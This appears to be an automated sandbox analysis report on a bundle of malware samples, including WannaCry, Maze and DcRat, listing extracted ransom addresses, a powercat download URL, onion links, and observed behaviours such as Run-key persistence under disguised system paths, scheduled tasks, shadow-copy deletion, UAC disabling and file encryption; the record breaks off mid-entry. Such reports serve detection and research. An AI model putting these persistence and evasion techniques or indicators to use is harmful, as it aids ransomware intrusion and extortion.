Overview
overview
10Static
static
101.exe
windows7_x64
61.exe
windows10-2004_x64
610.exe
windows7_x64
1010.exe
windows10-2004_x64
102.doc
windows7_x64
102.doc
windows10-2004_x64
13.xlsx
windows7_x64
103.xlsx
windows10-2004_x64
14.exe
windows7_x64
104.exe
windows10-2004_x64
15.exe
windows7_x64
105.exe
windows10-2004_x64
16.exe
windows7_x64
106.exe
windows10-2004_x64
107.exe
windows7_x64
107.exe
windows10-2004_x64
18.exe
windows7_x64
108.exe
windows10-2004_x64
109.docm
windows7_x64
109.docm
windows10-2004_x64
10rip.bat
windows7_x64
10rip.bat
windows10-2004_x64
10Analysis
-
max time kernel
157s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
23/03/2022, 21:00
Static task
static1
Behavioral task
behavioral1
Sample
1.exe
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral3
Sample
10.exe
Resource
win7-20220310-en
Behavioral task
behavioral4
Sample
10.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
2.doc
Resource
win7-20220311-en
Behavioral task
behavioral6
Sample
2.doc
Resource
win10v2004-20220310-en
Behavioral task
behavioral7
Sample
3.xlsx
Resource
win7-20220311-en
Behavioral task
behavioral8
Sample
3.xlsx
Resource
win10v2004-20220310-en
Behavioral task
behavioral9
Sample
4.exe
Resource
win7-20220311-en
Behavioral task
behavioral10
Sample
4.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral11
Sample
5.exe
Resource
win7-20220310-en
Behavioral task
behavioral12
Sample
5.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral13
Sample
6.exe
Resource
win7-20220310-en
Behavioral task
behavioral14
Sample
6.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral15
Sample
7.exe
Resource
win7-20220311-en
Behavioral task
behavioral16
Sample
7.exe
Resource
win10v2004-20220310-en
Behavioral task
behavioral17
Sample
8.exe
Resource
win7-20220311-en
Behavioral task
behavioral18
Sample
8.exe
Resource
win10v2004-20220310-en
Behavioral task
behavioral19
Sample
9.docm
Resource
win7-20220311-en
Behavioral task
behavioral20
Sample
9.docm
Resource
win10v2004-en-20220113
Behavioral task
behavioral21
Sample
rip.bat
Resource
win7-20220310-en
Behavioral task
behavioral22
Sample
rip.bat
Resource
win10v2004-en-20220113
General
-
Target
rip.bat
Malware Config
Extracted
http://192.168.5.128/powercat.ps1
Extracted
C:\Users\Admin\AppData\Local\Temp\@[email protected]
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Extracted
C:\DECRYPT-FILES.txt
maze
http://aoacugmutagkwctu.onion/6c2b0cc8f1b719ac
https://mazedecrypt.top/6c2b0cc8f1b719ac
Signatures
-
DcRat 21 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 6208 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\ShellComponents\\System.exe\"" 6.exe 6292 schtasks.exe 452 schtasks.exe 776 schtasks.exe 5852 schtasks.exe 4616 schtasks.exe 4924 schtasks.exe 444 schtasks.exe 6448 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation cmd.exe 5920 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Defender\\ja-JP\\dllhost.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RuntimeBroker.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\odt\\cmd.exe\"" 6.exe 6248 schtasks.exe 3500 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Windows\\SystemApps\\Microsoft.Windows.Search_cw5n1h2txyewy\\Search.Core\\SearchApp.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\WindowsRE\\smss.exe\"" 6.exe 7072 schtasks.exe 6128 schtasks.exe -
Maze
Ransomware family also known as ChaCha.
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5852 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4616 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6208 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6248 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6292 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6448 5564 schtasks.exe 126 Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 6740 2536 cmd.exe 138 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 452 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7072 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5920 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6128 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4924 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 444 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3500 5564 schtasks.exe 126 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 776 5564 schtasks.exe 126 -
Wannacry
WannaCry is a ransomware cryptoworm.
-
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE Maze/ID Ransomware Activity
suricata: ET MALWARE Maze/ID Ransomware Activity
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 13 IoCs
pid Process 6872 svchost.exe 3580 Fondue.exe 5372 taskdl.exe 3508 taskdl.exe 6108 @[email protected] 3132 @[email protected] 7032 taskhsvc.exe 6788 taskse.exe 5936 @[email protected] 5392 taskdl.exe 3660 taskse.exe 4864 @[email protected] 2888 taskdl.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\CheckpointOpen.png => C:\Users\Admin\Pictures\CheckpointOpen.png.cARvYXg 8.exe File renamed C:\Users\Admin\Pictures\ProtectStart.tif => C:\Users\Admin\Pictures\ProtectStart.tif.IraDM6z 8.exe File opened for modification C:\Users\Admin\Pictures\RequestUnpublish.tiff 8.exe File renamed C:\Users\Admin\Pictures\RequestUnpublish.tiff => C:\Users\Admin\Pictures\RequestUnpublish.tiff.XU22HD6 8.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 12 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6c2b0cc8f1b719ac.tmp 8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\6c2b0cc8f1b719ac.tmp 8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD837E.tmp 10.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt.WNCRY 10.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD83A3.tmp 10.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt.WNCRYT 10.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt.WNCRY 10.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt 10.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt 8.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt 8.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt.WNCRYT 10.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt 10.exe -
Loads dropped DLL 9 IoCs
pid Process 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 6716 icacls.exe -
Adds Run key to start application 2 TTPs 17 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\pwahelper\\msedge.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\isljbgsxj479 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\odt\\cmd.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Windows\\SystemApps\\Microsoft.Windows.Search_cw5n1h2txyewy\\Search.Core\\SearchApp.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dllhost.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\10 = "\"C:\\Users\\Admin\\Documents\\My Pictures\\10.exe\"" 6.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows Defender\\ja-JP\\dllhost.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Windows\\ShellComponents\\System.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fondue = "\"C:\\Windows\\SysWOW64\\glmf32\\Fondue.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10\\8.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\WindowsRE\\smss.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RuntimeBroker.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.VisualElementsManifest\\msedge.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\ProgramData\\Microsoft OneDrive\\setup\\TrustedInstaller.exe\"" 6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\odt\\winlogon.exe\"" 6.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fondue.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Fondue.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\glmf32\Fondue.exe 6.exe File opened for modification C:\Windows\SysWOW64\glmf32\Fondue.exe 6.exe File created C:\Windows\SysWOW64\glmf32\8b374df4eb1a1372a3aa077a518410b5ff84f165 6.exe -
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\000.bmp" 8.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" 10.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Drops file in Program Files directory 49 IoCs
description ioc Process File opened for modification C:\Program Files\DebugExpand.png 8.exe File opened for modification C:\Program Files\MergeWrite.midi 8.exe File opened for modification C:\Program Files\RenameRequest.html 8.exe File created C:\Program Files\Windows Defender\ja-JP\5940a34987c99120d96dace90a3f93f329dcad63 6.exe File opened for modification C:\Program Files\CompressConvertFrom.aiff 8.exe File opened for modification C:\Program Files\EnterRegister.rtf 8.exe File opened for modification C:\Program Files\WriteEnter.js 8.exe File created C:\Program Files\DECRYPT-FILES.txt 8.exe File opened for modification C:\Program Files\ConfirmSelect.TS 8.exe File opened for modification C:\Program Files\ConvertRepair.tif 8.exe File opened for modification C:\Program Files\MergeNew.wma 8.exe File opened for modification C:\Program Files\RepairTest.tiff 8.exe File opened for modification C:\Program Files\SetAssert.M2T 8.exe File opened for modification C:\Program Files\SetClose.docm 8.exe File opened for modification C:\Program Files\UnregisterRestart.vsw 8.exe File opened for modification C:\Program Files\AssertRename.ps1 8.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper\61a52ddc9dd915470897a065f14eeedfa88f98fd 6.exe File opened for modification C:\Program Files\SelectProtect.ppsm 8.exe File created C:\Program Files (x86)\Windows Portable Devices\dllhost.exe 6.exe File created C:\Program Files (x86)\Windows Portable Devices\5940a34987c99120d96dace90a3f93f329dcad63 6.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe 6.exe File opened for modification C:\Program Files\MountWatch.vsd 8.exe File opened for modification C:\Program Files\LockDeny.mp3 8.exe File opened for modification C:\Program Files\OpenUpdate.vstm 8.exe File opened for modification C:\Program Files\RevokeRequest.au3 8.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220129010009.pma setup.exe File opened for modification C:\Program Files\ConvertExit.jfif 8.exe File opened for modification C:\Program Files\StopEnter.dxf 8.exe File opened for modification C:\Program Files\SwitchSearch.inf 8.exe File opened for modification C:\Program Files (x86)\6c2b0cc8f1b719ac.tmp 8.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper\msedge.exe 6.exe File opened for modification C:\Program Files\DisableSearch.mpeg3 8.exe File opened for modification C:\Program Files\6c2b0cc8f1b719ac.tmp 8.exe File opened for modification C:\Program Files\DebugRepair.vsw 8.exe File opened for modification C:\Program Files\JoinNew.potm 8.exe File opened for modification C:\Program Files\RequestUninstall.sql 8.exe File opened for modification C:\Program Files\TestRestart.ADTS 8.exe File opened for modification C:\Program Files\UnpublishOpen.php 8.exe File opened for modification C:\Program Files\UnpublishSearch.rar 8.exe File created C:\Program Files\Windows Defender\ja-JP\dllhost.exe 6.exe File created C:\Program Files (x86)\DECRYPT-FILES.txt 8.exe File opened for modification C:\Program Files\ExpandRename.temp 8.exe File opened for modification C:\Program Files\MeasureGet.ppsm 8.exe File opened for modification C:\Program Files\PopMerge.sql 8.exe File opened for modification C:\Program Files\ReceiveSelect.crw 8.exe File opened for modification C:\Program Files\UnpublishPublish.emz 8.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\61a52ddc9dd915470897a065f14eeedfa88f98fd 6.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f0f6a3ca-b098-44e8-86b1-6a820af6fb30.tmp setup.exe File opened for modification C:\Program Files\BackupSwitch.search-ms 8.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\ShellComponents\27d1bcfc3c54e0e44ea423ffd4ee81fe73670a2a 6.exe File created C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Search.Core\SearchApp.exe 6.exe File created C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Search.Core\38384e6a620884a6b69bcc56f80d556f9200171c 6.exe File created C:\Windows\CSC\msedge.exe 6.exe File created C:\Windows\ShellComponents\System.exe 6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4616 schtasks.exe 444 schtasks.exe 6448 schtasks.exe 7072 schtasks.exe 4924 schtasks.exe 5852 schtasks.exe 6208 schtasks.exe 6292 schtasks.exe 6248 schtasks.exe 3500 schtasks.exe 776 schtasks.exe 452 schtasks.exe 5920 schtasks.exe 6128 schtasks.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings 6.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 7124 reg.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 4868 WINWORD.EXE 4868 WINWORD.EXE 2536 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 5112 msedge.exe 5112 msedge.exe 3832 msedge.exe 3832 msedge.exe 460 msedge.exe 460 msedge.exe 2996 msedge.exe 2996 msedge.exe 1852 6.exe 1852 6.exe 1388 msedge.exe 1388 msedge.exe 1852 6.exe 1852 6.exe 6060 8.exe 6060 8.exe 5612 powershell.exe 5612 powershell.exe 5612 powershell.exe 1644 6.exe 1644 6.exe 1644 6.exe 1644 6.exe 1644 6.exe 3580 Fondue.exe 3580 Fondue.exe 4856 identity_helper.exe 4856 identity_helper.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 7032 taskhsvc.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
pid Process 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1852 6.exe Token: SeBackupPrivilege 6860 vssvc.exe Token: SeRestorePrivilege 6860 vssvc.exe Token: SeAuditPrivilege 6860 vssvc.exe Token: SeDebugPrivilege 5612 powershell.exe Token: SeDebugPrivilege 1644 6.exe Token: SeDebugPrivilege 3580 Fondue.exe Token: SeIncreaseQuotaPrivilege 4668 wmic.exe Token: SeSecurityPrivilege 4668 wmic.exe Token: SeTakeOwnershipPrivilege 4668 wmic.exe Token: SeLoadDriverPrivilege 4668 wmic.exe Token: SeSystemProfilePrivilege 4668 wmic.exe Token: SeSystemtimePrivilege 4668 wmic.exe Token: SeProfSingleProcessPrivilege 4668 wmic.exe Token: SeIncBasePriorityPrivilege 4668 wmic.exe Token: SeCreatePagefilePrivilege 4668 wmic.exe Token: SeBackupPrivilege 4668 wmic.exe Token: SeRestorePrivilege 4668 wmic.exe Token: SeShutdownPrivilege 4668 wmic.exe Token: SeDebugPrivilege 4668 wmic.exe Token: SeSystemEnvironmentPrivilege 4668 wmic.exe Token: SeRemoteShutdownPrivilege 4668 wmic.exe Token: SeUndockPrivilege 4668 wmic.exe Token: SeManageVolumePrivilege 4668 wmic.exe Token: 33 4668 wmic.exe Token: 34 4668 wmic.exe Token: 35 4668 wmic.exe Token: 36 4668 wmic.exe Token: SeIncreaseQuotaPrivilege 4668 wmic.exe Token: SeSecurityPrivilege 4668 wmic.exe Token: SeTakeOwnershipPrivilege 4668 wmic.exe Token: SeLoadDriverPrivilege 4668 wmic.exe Token: SeSystemProfilePrivilege 4668 wmic.exe Token: SeSystemtimePrivilege 4668 wmic.exe Token: SeProfSingleProcessPrivilege 4668 wmic.exe Token: SeIncBasePriorityPrivilege 4668 wmic.exe Token: SeCreatePagefilePrivilege 4668 wmic.exe Token: SeBackupPrivilege 4668 wmic.exe Token: SeRestorePrivilege 4668 wmic.exe Token: SeShutdownPrivilege 4668 wmic.exe Token: SeDebugPrivilege 4668 wmic.exe Token: SeSystemEnvironmentPrivilege 4668 wmic.exe Token: SeRemoteShutdownPrivilege 4668 wmic.exe Token: SeUndockPrivilege 4668 wmic.exe Token: SeManageVolumePrivilege 4668 wmic.exe Token: 33 4668 wmic.exe Token: 34 4668 wmic.exe Token: 35 4668 wmic.exe Token: 36 4668 wmic.exe Token: 33 4740 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4740 AUDIODG.EXE Token: SeIncreaseQuotaPrivilege 4936 WMIC.exe Token: SeSecurityPrivilege 4936 WMIC.exe Token: SeTakeOwnershipPrivilege 4936 WMIC.exe Token: SeLoadDriverPrivilege 4936 WMIC.exe Token: SeSystemProfilePrivilege 4936 WMIC.exe Token: SeSystemtimePrivilege 4936 WMIC.exe Token: SeProfSingleProcessPrivilege 4936 WMIC.exe Token: SeIncBasePriorityPrivilege 4936 WMIC.exe Token: SeCreatePagefilePrivilege 4936 WMIC.exe Token: SeBackupPrivilege 4936 WMIC.exe Token: SeRestorePrivilege 4936 WMIC.exe Token: SeShutdownPrivilege 4936 WMIC.exe Token: SeDebugPrivilege 4936 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1388 msedge.exe 1388 msedge.exe 1388 msedge.exe 4868 WINWORD.EXE 1904 EXCEL.EXE 1904 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 25 IoCs
pid Process 4868 WINWORD.EXE 4868 WINWORD.EXE 1904 EXCEL.EXE 4868 WINWORD.EXE 1904 EXCEL.EXE 1904 EXCEL.EXE 1904 EXCEL.EXE 4868 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 2536 WINWORD.EXE 6108 @[email protected] 6108 @[email protected] 3132 @[email protected] 3132 @[email protected] 5936 @[email protected] 5936 @[email protected] 4864 @[email protected] -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4880 wrote to memory of 5104 4880 cmd.exe 81 PID 4880 wrote to memory of 5104 4880 cmd.exe 81 PID 4880 wrote to memory of 5104 4880 cmd.exe 81 PID 4880 wrote to memory of 5116 4880 cmd.exe 82 PID 4880 wrote to memory of 5116 4880 cmd.exe 82 PID 4880 wrote to memory of 5116 4880 cmd.exe 82 PID 4880 wrote to memory of 4028 4880 cmd.exe 83 PID 4880 wrote to memory of 4028 4880 cmd.exe 83 PID 4880 wrote to memory of 4028 4880 cmd.exe 83 PID 4880 wrote to memory of 3060 4880 cmd.exe 87 PID 4880 wrote to memory of 3060 4880 cmd.exe 87 PID 4880 wrote to memory of 3060 4880 cmd.exe 87 PID 5116 wrote to memory of 4612 5116 1.exe 91 PID 5116 wrote to memory of 4612 5116 1.exe 91 PID 5104 wrote to memory of 4604 5104 1.exe 90 PID 5104 wrote to memory of 4604 5104 1.exe 90 PID 4028 wrote to memory of 4624 4028 1.exe 89 PID 4028 wrote to memory of 4624 4028 1.exe 89 PID 3060 wrote to memory of 4632 3060 1.exe 92 PID 3060 wrote to memory of 4632 3060 1.exe 92 PID 4880 wrote to memory of 4868 4880 cmd.exe 93 PID 4880 wrote to memory of 4868 4880 cmd.exe 93 PID 4612 wrote to memory of 4444 4612 cmd.exe 98 PID 4612 wrote to memory of 4444 4612 cmd.exe 98 PID 4632 wrote to memory of 1388 4632 cmd.exe 95 PID 4632 wrote to memory of 1388 4632 cmd.exe 95 PID 4604 wrote to memory of 1220 4604 cmd.exe 97 PID 4604 wrote to memory of 1220 4604 cmd.exe 97 PID 4624 wrote to memory of 4756 4624 cmd.exe 96 PID 4624 wrote to memory of 4756 4624 cmd.exe 96 PID 1388 wrote to memory of 2876 1388 msedge.exe 101 PID 1388 wrote to memory of 2876 1388 msedge.exe 101 PID 1220 wrote to memory of 4172 1220 msedge.exe 100 PID 1220 wrote to memory of 4172 1220 msedge.exe 100 PID 4756 wrote to memory of 2976 4756 msedge.exe 102 PID 4756 wrote to memory of 2976 4756 msedge.exe 102 PID 4444 wrote to memory of 4512 4444 msedge.exe 99 PID 4444 wrote to memory of 4512 4444 msedge.exe 99 PID 4880 wrote to memory of 1904 4880 cmd.exe 103 PID 4880 wrote to memory of 1904 4880 cmd.exe 103 PID 4880 wrote to memory of 1904 4880 cmd.exe 103 PID 4880 wrote to memory of 4044 4880 cmd.exe 104 PID 4880 wrote to memory of 4044 4880 cmd.exe 104 PID 4880 wrote to memory of 4044 4880 cmd.exe 104 PID 4880 wrote to memory of 452 4880 cmd.exe 105 PID 4880 wrote to memory of 452 4880 cmd.exe 105 PID 4880 wrote to memory of 452 4880 cmd.exe 105 PID 4044 wrote to 